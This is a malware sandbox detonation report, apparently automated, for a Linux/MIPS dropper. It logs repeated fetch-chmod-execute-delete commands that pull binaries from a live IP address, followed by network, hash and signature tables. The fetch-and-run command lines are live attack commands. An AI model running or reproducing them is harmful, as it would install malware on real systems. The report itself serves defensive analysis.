[curl -O http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/chmod
[chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
[./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/rm
[rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/wget
[wget http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/chmod
[chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
[./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/rm
[rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/wget
[wget http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/chmod
[chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
[./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/rm
[rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/wget
[wget http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/chmod
[chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
[./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/rm
[rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/wget
[wget http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/chmod
[chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
[./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/rm
[rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/wget
[wget http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/chmod
[chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
[./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/rm
[rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/wget
[wget http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/chmod
[chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
[./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/rm
[rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/wget
[wget http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/chmod
[chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
[./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/rm
[rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/wget
[wget http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/chmod
[chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
[./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/rm
[rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/wget
[wget http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/chmod
[chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
[./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/rm
[rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/wget
[wget http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/chmod
[chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
[./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/rm
[rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/wget
[wget http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/chmod
[chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
[./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/rm
[rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/wget
[wget http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/chmod
[chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
[./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/rm
[rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/wget
[wget http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/chmod
[chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
[./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/rm
[rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/wget
[wget http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/chmod
[chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
[./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/rm
[rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/wget
[wget http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/chmod
[chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
[./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/rm
[rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/wget
[wget http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/chmod
[chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
[./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/rm
[rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/wget
[wget http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/chmod
[chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
[./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/rm
[rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/wget
[wget http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/chmod
[chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
[./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/rm
[rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/wget
[wget http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/chmod
[chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
[./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/rm
[rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/wget
[wget http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/chmod
[chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
[./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/rm
[rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 02:02
Reported
2024-11-21 02:04
Platform
debian9-mipsel-20240611-en
Max time kernel
83s
Max time network
85s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | N/A |
| N/A | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | N/A |
| N/A | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | N/A |
| N/A | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | N/A |
| N/A | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | N/A |
| N/A | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | N/A |
| N/A | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | N/A |
| N/A | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | N/A |
| N/A | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | N/A |
| N/A | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | N/A |
| N/A | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | N/A |
| N/A | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | N/A |
| N/A | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | N/A |
| N/A | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | N/A |
| N/A | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | N/A |
| N/A | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | N/A |
| N/A | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | N/A |
| N/A | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | N/A |
| N/A | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | N/A |
| N/A | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | N/A |
| N/A | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | N/A |
| N/A | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | N/A |
| N/A | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | N/A |
| N/A | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | N/A |
| N/A | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | N/A |
| N/A | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | N/A |
| N/A | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | N/A |
| N/A | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /usr/bin/curl | N/A |
